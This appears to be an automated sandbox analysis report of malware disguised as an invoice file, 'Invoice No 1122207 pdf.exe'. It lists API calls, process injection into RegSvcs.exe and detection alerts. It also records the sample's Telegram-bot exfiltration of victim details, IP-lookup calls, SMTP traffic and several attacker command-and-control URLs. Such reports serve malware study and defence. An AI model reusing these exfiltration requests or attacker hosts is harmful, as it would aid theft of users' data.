Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_004868EE FindFirstFileW,FindClose,	0_2_004868EE
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0048698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0048698F
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0047D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0047D076
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0047D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0047D3A9
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00489642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00489642
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0048979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0048979D
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00489B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00489B2B
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0047DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0047DBBE
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00485C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00485C97
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B2C2A2 FindFirstFileExW,	7_2_00B2C2A2
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B668EE FindFirstFileW,FindClose,	7_2_00B668EE
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B6698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	7_2_00B6698F
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B5D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	7_2_00B5D076
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B5D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	7_2_00B5D3A9
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B69642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	7_2_00B69642
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B6979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	7_2_00B6979D
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B5DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	7_2_00B5DBBE
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B69B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	7_2_00B69B2B
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B65C97 FindFirstFileW,FindNextFileW,FindClose,	7_2_00B65C97

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 02E1F2EDh	8_2_02E1F161
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 02E1F2EDh	8_2_02E1F3BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 02E1F2EDh	8_2_02E1F33C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 02E1FAA9h	8_2_02E1F7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0693AF79h	8_2_0693ACC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06930D0Dh	8_2_06930B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06931697h	8_2_06930B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0693F831h	8_2_0693F588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0693B540h	8_2_0693B128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_06930673
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0693E9F3h	8_2_0693E748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0693E599h	8_2_0693E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_06930040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0693EF81h	8_2_0693ECD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_06930853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0693B540h	8_2_0693B46E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0693D891h	8_2_0693D5E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0693B540h	8_2_0693B11A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0693F3D9h	8_2_0693F130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0693E141h	8_2_0693DE98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0693DCE9h	8_2_0693DA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0693FC89h	8_2_0693F9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0246F2EDh	11_2_0246F33C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0246F2EDh	11_2_0246F150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0246FAA9h	11_2_0246F7F0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:49803 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:49873 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 10.2.ageless.exe.1600000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.ageless.exe.1580000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.10:49860 -> 208.91.199.223:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:284992%0D%0ADate%20and%20Time:%2015/01/2025%20/%2012:01:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20284992%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:284992%0D%0ADate%20and%20Time:%2015/01/2025%20/%2012:22:00%0D%0ACountry%20Name:%20%0D%0A%5B%20284992%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49775 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49853 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49707 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49776 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49770 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49796 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49848 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49859 -> 104.21.112.1:443

Source: global traffic

TCP traffic: 192.168.2.10:49860 -> 208.91.199.223:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.10:49758 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.10:49829 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_0048CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0048CE44

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:284992%0D%0ADate%20and%20Time:%2015/01/2025%20/%2012:01:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20284992%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:284992%0D%0ADate%20and%20Time:%2015/01/2025%20/%2012:22:00%0D%0ACountry%20Name:%20%0D%0A%5B%20284992%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: us2.smtp.mailhostbox.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 15 Jan 2025 14:02:17 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 15 Jan 2025 14:02:28 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: RegSvcs.exe, 00000008.00000002.2527756944.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.00000000025D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: ageless.exe, 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: ageless.exe, 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2527756944.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: ageless.exe, 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2527756944.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000008.00000002.2527756944.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002481000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002543000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000008.00000002.2527756944.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: ageless.exe, 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000008.00000002.2527756944.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000008.00000002.2527756944.0000000003104000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2527756944.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.00000000025D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: ageless.exe, 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2527756944.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000008.00000002.2530605379.0000000004003000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2529344457.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000008.00000002.2527756944.00000000030A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002543000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: ageless.exe, 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2527756944.00000000030A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002543000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
